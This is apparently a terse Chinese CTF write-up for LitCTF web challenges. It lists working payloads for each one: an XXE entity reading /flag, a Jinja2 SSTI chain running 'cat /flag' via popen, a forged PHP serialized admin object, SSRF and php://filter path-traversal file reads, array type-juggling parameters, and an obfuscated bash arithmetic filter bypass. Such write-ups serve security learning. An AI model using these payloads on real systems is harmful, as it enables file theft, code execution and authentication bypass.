Litctf-web
exx
xxe,
html
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
data:image/s3,"s3://crabby-images/f938c/f938cf5be8013e594e7d52b2785b8576b1a5ac7f" alt=""
一个...池子
ssti,没有过滤
{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
data:image/s3,"s3://crabby-images/c01b6/c01b6dd29127b5d7287538c4f8f328a248d72533" alt=""
SAS - Serializing Authentication System
反序列化
php
<?php
class User {
public $username="admin";
public $password="secure_password";
}
$a=new User();
echo base64_encode(serialize($a));
?>
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
data:image/s3,"s3://crabby-images/88dfe/88dfe77d8cfe59c8cdc9a08497b54ccd173eba60" alt=""
浏览器也能套娃?
ssrf
file:///flag
data:image/s3,"s3://crabby-images/26e71/26e712c2ec5cb13b4eb217a8ae0391f7e88549ec" alt=""
高亮主题(划掉)背景查看器
文件包含伪协议
POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag
根目录下
data:image/s3,"s3://crabby-images/a094d/a094d596679ec14ce07583f7bdaf37d362223f0a" alt=""
百万美元的诱惑
rce
/下
?a[]=1&b[]=2&c=2025a
data:image/s3,"s3://crabby-images/7a73b/7a73b54b4ef4f6625135f7c4475a742e5b5f2eb3" alt=""
/dollar.php
取反绕过,自增应该也行试了下没过。
$(())为0
$_++也为1也可以应该
${_}=""输出上一次执行结果
( ( ((~ (( ((${_}))))=-1
%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
data:image/s3,"s3://crabby-images/8e8a9/8e8a9ecf0d2ad95ac10580b9fce0aba85540235d" alt=""